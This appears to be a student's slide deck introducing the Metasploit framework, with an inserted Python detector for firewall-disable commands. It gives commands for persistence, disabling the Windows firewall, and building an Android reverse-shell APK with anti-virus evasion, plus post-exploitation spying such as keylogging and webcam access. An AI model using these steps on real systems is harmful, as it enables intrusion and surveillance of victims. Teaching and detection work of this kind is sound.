INTRODUCTION TO METASPLOIT
#METASPLOIT
G.Manideep, @mani0x00
- God of Frameworks
#whoami
<?php
// The speaker's self-introduction, written as a small PHP joke:
// whichever label you pick, the answer is the same.
$var = "@mani0x00";
if ($var == "script kiddie") {
    echo 'security flows in blood';
} elseif ($var == "white hat") {
    echo 'security flows in blood';
} else {
    echo 'security flows in blood';
}
?>
G.Manideep, B.Tech 3rd year, E.C.E
@mani0x00
#Creator
• Developer of the Metasploit Framework.
• Chief Researcher at Boston.
• Leading provider of security data and analytics software and cloud solutions.
#History
• In Oct 2003 at DEFCON, Metasploit 1.0 was released with 11 exploits by H.D. Moore.
• It was initially written entirely in Perl and later completely rewritten in Ruby.
• Acquired by Rapid7 in 2009 under some terms and conditions.
• Remains open source.
#Getting started
#Vulnerability
A vulnerability is a weakness in a system that allows an attacker to exploit the system.
#Getting started
#Exploit
An exploit is an attack on a system, especially one that takes advantage of a particular vulnerability of the system, using payloads.
#Getting started
#Payload
A payload is a piece of code that executes on the vulnerable system after the system has been exploited.
#Architecture
Tools
Libraries: Rex, MSF core, MSF base
Plugins
Modules: Auxiliary, Payloads, Exploits, Encoders, Nops
Interfaces: Console, CLI, Web, Armitage
#Libraries
rex
msf::core
msf::base
#Modules
Exploits
Payloads
Auxiliary
Encoders
Nops
#Auxiliary
Typically, an exploit without a payload is called an auxiliary module.
Used for scanning, fuzzing and some automated tasks.
Makes use of mixins.
To run one, type run.
#Encoders
Encoders are used to evade anti-virus software.
Payloads are encoded.
E.g.
• shikata_ga_nai
• nonalpha
• bloxor
#Nops
Mainly used to keep the size of the payload consistent.
The framework ships 8 NOP modules.
#Interfaces
• msfcli
• msfconsole
• msfweb
• Armitage (GUI)
#Armitage (GUI)
Developed by Raphael Mudge.
#msfconsole
An interactive console.
Starting msfconsole
#msfconsole
Here our journey begins
 msf >
#Let's attack
#Port scanning
Port scanning is used for information gathering.
Nmap is used for port scanning.
Auxiliary modules can also be used.
As information gathering is important in pen testing, let's do a traditional scan.
#Port scanning
Using auxiliary modules:
#Port scanning
Using Nmap:
#Exploitation
Mostly an attacker sends a combination of exploit and payload.
In msfconsole there are some simple commands that make our work pretty easy; some of them are (core commands):
search, use, set
#Exploitation
Using an exploit:
Just type use <path of suggested exploit>.
Prefer the exploit that has a good ranking.
#Exploitation
Setting parameters:
Just type show options and find the parameters to be filled.
Then set each parameter by typing set <parameter> <value>.
#Exploitation
Similar to the exploit search, search for an appropriate payload.
Then set it using set PAYLOAD and fill in the payload parameters.
Then just type exploit.
#Some successful exploits
ms03_026_dcom
ms08_067_netapi (evergreen :D)
ms11_050_mshtml
ms10_042_helpctr_xss_cmd_exec
ms10_046_shortcut_icon_dllloader
dreamftp_format
distcc_exec (for Linux)
#Maintaining access
By executing a script with some arguments as shown below:
run persistence -S (admin priv) -i (time interval) -p (rport) -r (lhost)
#Maintaining access
By listening on the specified port using the multi/handler exploit.
#Post Exploitation
Using meterpreter we can perform different tasks with the privileges of the victim.
We can grab screenshots, keylog and much more by loading:
• Espia
• Incognito
• Pivot
• Sniffer
• Priv
#Post Exploitation
This can also be done using modules.
Let's take multiple screenshots at a certain interval.
#Post Exploitation
Migrate to another process that has admin privileges and then complete the task.
#Post Exploitation
What else can we do in post exploitation?
Let's see some of them:
-Keylogging
-Screenshots
-View live screen
-Access webcam
-Take control of keyboard and mouse
-Delete user
-Pivot
-VM detection and many more.
#Privilege Escalation
Gaining system privileges that are meant to be protected is called privilege escalation.
Some of the ways are migrating the process and stealing tokens to get the desired privileges.
Let's take a look at some of them.
#Privilege Escalation
We can migrate to a PID that has admin privileges.
#Privilege Escalation
By loading Incognito, we can steal (impersonate) tokens to get privileges.
#Privilege Escalation
To use it, type impersonate_token <token>
#Privilege Escalation
#HashDump:
Dumps all users' usernames and password hashes.
#What else can we do?
We can even sniff the victim's packets remotely.
Evading firewalls
Let's take a look
#Bypassing Firewall
#Bypassing Firewall
After getting a meterpreter session, get a shell and type
> netsh firewall show opmode
#Bypassing Firewall
Now type
> netsh firewall set opmode mode= DISABLE
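The netsh command above leaves a process-creation trace on the host, which is what a blue team looks for. The following is an added example (not from the slides): a small detector run over constructed Sysmon-style process-creation events; it flags the legacy "netsh firewall set opmode ... DISABLE" form shown on the slide and also generalises to the newer "netsh advfirewall set <profile> state off" syntax. The event fields and sample values are assumptions made up for the example.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (not real telemetry). The
# "cmdline" field mimics what a Sysmon EventID 1 / EDR record would carry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws01", "user": "alice", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh firewall show opmode"},                      # read-only, benign
    {"host": "ws01", "user": "alice", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh firewall set opmode mode= DISABLE"},         # the slide's command
    {"host": "ws02", "user": "SYSTEM", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall set allprofiles state off"},     # modern equivalent
    {"host": "ws03", "user": "bob", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall firewall show rule name=all"},   # benign
    {"host": "ws03", "user": "bob", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "netsh  firewall set opmode disable"'}, # wrapped in cmd.exe
]

# Legacy "netsh firewall" syntax (as on the slide) and newer "netsh advfirewall"
# syntax. Input is lower-cased and whitespace-collapsed before matching, so
# odd spacing such as "mode= DISABLE" or doubled spaces does not evade the check.
DISABLE_PATTERNS = [
    re.compile(r"\bnetsh\s+firewall\s+set\s+opmode\b.*\bdisable\b"),
    re.compile(r"\bnetsh\s+advfirewall\s+set\s+\w+\s+state\s+off\b"),
]


def is_firewall_disable(cmdline: str) -> bool:
    """Return True if the command line turns the Windows host firewall off."""
    norm = " ".join(cmdline.lower().split())
    return any(p.search(norm) for p in DISABLE_PATTERNS)


def find_firewall_tampering(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Filter process-creation events down to firewall-disable attempts."""
    return [e for e in events if is_firewall_disable(e["cmdline"])]


if __name__ == "__main__":
    for hit in find_firewall_tampering(SAMPLE_EVENTS):
        print(f"[ALERT] {hit['host']} user={hit['user']}: {hit['cmdline']}")
```

A real deployment would pair this with the firewall's own configuration-change events, since an attacker who already has a shell may not use netsh.exe at all.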
#Attacking Linux
Using distcc_exec
#Attacking Android
Using msfpayload:
msfpayload android/meterpreter/reverse_tcp LHOST=<loc-ip> LPORT=<any> R > <desired path for saving>/<file>.apk
Install that apk file on the device.
If there is any anti-virus, encode it with encoders.
#Attacking Android
Listen on the mentioned port using the multi/handler exploit.
#Thank you!
@mani0x00